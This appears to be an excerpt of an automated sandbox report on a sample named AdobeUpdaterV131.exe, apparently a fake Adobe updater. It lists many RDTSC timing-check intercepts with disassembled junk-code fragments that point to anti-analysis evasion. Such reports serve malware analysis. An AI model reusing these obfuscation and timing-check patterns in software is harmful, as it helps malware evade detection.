            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EC0A42 second address: 4EC0A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10DBD second address: 4F10DDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 5FDD4F89h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10DDE second address: 4F10DE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED05DB second address: 4ED05E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED05E1 second address: 4ED05E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED05E5 second address: 4ED060D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F09D0D9C3E4h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED060D second address: 4ED0613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED0613 second address: 4ED064F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push edx 0x0000000e movzx esi, bx 0x00000011 pop edx 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 movzx eax, dx 0x00000019 call 00007F09D0D9C3E9h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED064F second address: 4ED069B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 and esp, FFFFFFF0h 0x00000009 pushad 0x0000000a mov esi, edx 0x0000000c pushfd 0x0000000d jmp 00007F09D0731CAFh 0x00000012 sbb ah, 0000006Eh 0x00000015 jmp 00007F09D0731CB9h 0x0000001a popfd 0x0000001b popad 0x0000001c sub esp, 44h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F09D0731CADh 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED069B second address: 4ED06A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED06A1 second address: 4ED06BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F09D0731CB1h 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED06BF second address: 4ED0721 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F09D0D9C3DAh 0x00000009 jmp 00007F09D0D9C3E5h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F09D0D9C3E0h 0x00000015 xor al, FFFFFFD8h 0x00000018 jmp 00007F09D0D9C3DBh 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 mov dword ptr [esp], ebx 0x00000024 pushad 0x00000025 mov dh, al 0x00000027 mov ch, dl 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F09D0D9C3DFh 0x00000032 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED0721 second address: 4ED0749 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 jmp 00007F09D0731CABh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov ebx, 3428F70Ah 0x00000015 mov ebx, 35E779D6h 0x0000001a popad 0x0000001b xchg eax, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED0749 second address: 4ED074D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED074D second address: 4ED0753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED0753 second address: 4ED0759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED0759 second address: 4ED075D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED075D second address: 4ED07D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F09D0D9C3E4h 0x0000000e mov dword ptr [esp], edi 0x00000011 pushad 0x00000012 push esi 0x00000013 pushfd 0x00000014 jmp 00007F09D0D9C3DDh 0x00000019 and cx, EC96h 0x0000001e jmp 00007F09D0D9C3E1h 0x00000023 popfd 0x00000024 pop ecx 0x00000025 pushfd 0x00000026 jmp 00007F09D0D9C3E1h 0x0000002b sub esi, 7EA76DF6h 0x00000031 jmp 00007F09D0D9C3E1h 0x00000036 popfd 0x00000037 popad 0x00000038 mov edi, dword ptr [ebp+08h] 0x0000003b pushad 0x0000003c mov di, cx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED07D9 second address: 4ED082B instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [esp+24h], 00000000h 0x00000010 jmp 00007F09D0731CADh 0x00000015 lock bts dword ptr [edi], 00000000h 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F09D0731CACh 0x00000021 sbb eax, 64C32178h 0x00000027 jmp 00007F09D0731CABh 0x0000002c popfd 0x0000002d movzx ecx, bx 0x00000030 popad 0x00000031 jc 00007F0A427338BAh 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED082B second address: 4ED082F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED082F second address: 4ED0835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED0835 second address: 4ED0859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jmp 00007F09D0D9C3DDh 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F09D0D9C3DDh 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED0859 second address: 4ED08B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F09D0731CB7h 0x00000009 xor si, 33FEh 0x0000000e jmp 00007F09D0731CB9h 0x00000013 popfd 0x00000014 mov dx, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebx 0x0000001b pushad 0x0000001c mov eax, edx 0x0000001e popad 0x0000001f mov esp, ebp 0x00000021 jmp 00007F09D0731CB1h 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED08B8 second address: 4ED08BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED08BC second address: 4ED08CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED08CF second address: 4ED08D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED02DF second address: 4ED0353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c call 00007F09D0731CAEh 0x00000011 pop ecx 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F09D0731CB0h 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F09D0731CADh 0x00000022 sbb si, F356h 0x00000027 jmp 00007F09D0731CB1h 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 pushad 0x00000031 mov eax, 7FD82E63h 0x00000036 push ecx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED047D second address: 4ED04B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b jmp 00007F09D0D9C3DEh 0x00000010 cmp ecx, 01h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F09D0D9C3DAh 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED04B7 second address: 4ED04C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED04C6 second address: 4ED04DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0D9C3E4h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED04DE second address: 4ED04E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED04E2 second address: 4ED0534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F0A42D9E4BAh 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F09D0D9C3E8h 0x00000015 xor cx, 71F8h 0x0000001a jmp 00007F09D0D9C3DBh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edi 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F09D0D9C3E5h 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED0534 second address: 4ED053A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED053A second address: 4ED053E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED053E second address: 4ED0582 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jmp 00007F09D0731CB6h 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007F09D0731CADh 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED0582 second address: 4ED0587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED0587 second address: 4ED0596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F09D0731CAAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E40691 second address: 4E406C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov si, 9645h 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F09D0D9C3DEh 0x00000013 xor ch, FFFFFFD8h 0x00000016 jmp 00007F09D0D9C3DBh 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e mov cx, 9B25h 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E406C2 second address: 4E40760 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F09D0731CB2h 0x00000008 add ax, C038h 0x0000000d jmp 00007F09D0731CABh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F09D0731CB5h 0x0000001f xor ax, 0ED6h 0x00000024 jmp 00007F09D0731CB1h 0x00000029 popfd 0x0000002a mov ch, A2h 0x0000002c popad 0x0000002d push ebx 0x0000002e pop edi 0x0000002f popad 0x00000030 xchg eax, ebp 0x00000031 jmp 00007F09D0731CB2h 0x00000036 mov ebp, esp 0x00000038 jmp 00007F09D0731CB0h 0x0000003d sub esp, 10h 0x00000040 jmp 00007F09D0731CB0h 0x00000045 lea eax, dword ptr [ebp-10h] 0x00000048 pushad 0x00000049 push esi 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E40760 second address: 4E40780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov cx, 16FFh 0x00000009 popad 0x0000000a push dword ptr [ebp+08h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F09D0D9C3E1h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E40780 second address: 4E407C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov al, dh 0x0000000f pushfd 0x00000010 jmp 00007F09D0731CB4h 0x00000015 adc ax, EE78h 0x0000001a jmp 00007F09D0731CABh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E407C2 second address: 4E407FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 mov di, 5866h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movsx ebx, si 0x00000014 pushfd 0x00000015 jmp 00007F09D0D9C3E2h 0x0000001a sub cx, 5808h 0x0000001f jmp 00007F09D0D9C3DBh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E40873 second address: 4E40877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E40877 second address: 4E4089E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b call 00007F09D0D9C3E7h 0x00000010 pop ecx 0x00000011 movsx ebx, si 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E4089E second address: 4E408DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F09D0731CB1h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e jmp 00007F09D0731CAAh 0x00000013 push dword ptr [ebp+0Ch] 0x00000016 jmp 00007F09D0731CB0h 0x0000001b lea eax, dword ptr [ebp-08h] 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E408DD second address: 4E408E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E408E1 second address: 4E40927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F09D0731CB8h 0x0000000c add cx, 9BD8h 0x00000011 jmp 00007F09D0731CABh 0x00000016 popfd 0x00000017 popad 0x00000018 nop 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F09D0731CB0h 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E40927 second address: 4E40936 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E40936 second address: 4E4094E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0731CB4h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E4094E second address: 4E40952 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E40952 second address: 4E409D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F09D0731CACh 0x00000010 add ch, FFFFFFC8h 0x00000013 jmp 00007F09D0731CABh 0x00000018 popfd 0x00000019 call 00007F09D0731CB8h 0x0000001e pushfd 0x0000001f jmp 00007F09D0731CB2h 0x00000024 add ax, E558h 0x00000029 jmp 00007F09D0731CABh 0x0000002e popfd 0x0000002f pop eax 0x00000030 popad 0x00000031 nop 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 call 00007F09D0731CB0h 0x0000003a pop eax 0x0000003b call 00007F09D0731CABh 0x00000040 pop ecx 0x00000041 popad 0x00000042 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10EAA second address: 4F10EB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10EB0 second address: 4F10EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10EB6 second address: 4F10EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10EBA second address: 4F10EE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F09D0731CAAh 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10EE5 second address: 4F10EEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10EEB second address: 4F10EFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0731CADh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10EFC second address: 4F10F1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov ah, C9h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10F1A second address: 4F10F5D instructions: 0x00000000 rdtsc 0x00000002 movsx edi, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F09D0731CB0h 0x0000000d xor ecx, 09DB8DC8h 0x00000013 jmp 00007F09D0731CABh 0x00000018 popfd 0x00000019 popad 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F09D0731CB5h 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10F5D second address: 4F10F63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10F63 second address: 4F10F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F1045E second address: 4F10466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, di 0x00000007 popad 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10466 second address: 4F10475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0731CABh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E200CC second address: 4E200D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E200D0 second address: 4E200D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E200D6 second address: 4E200DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E200DC second address: 4E200E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E200E0 second address: 4E20166 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F09D0D9C3E9h 0x00000010 or eax, 760CE7D6h 0x00000016 jmp 00007F09D0D9C3E1h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F09D0D9C3E0h 0x00000022 and ax, D5F8h 0x00000027 jmp 00007F09D0D9C3DBh 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f pushad 0x00000030 mov dh, ch 0x00000032 jmp 00007F09D0D9C3E1h 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F09D0D9C3DDh 0x00000041 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E40BB8 second address: 4E40BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F09D0731CB1h 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e movzx esi, bx 0x00000011 mov cl, bl 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E40BE0 second address: 4E40BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E40BE4 second address: 4E40C01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E40C01 second address: 4E40C07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
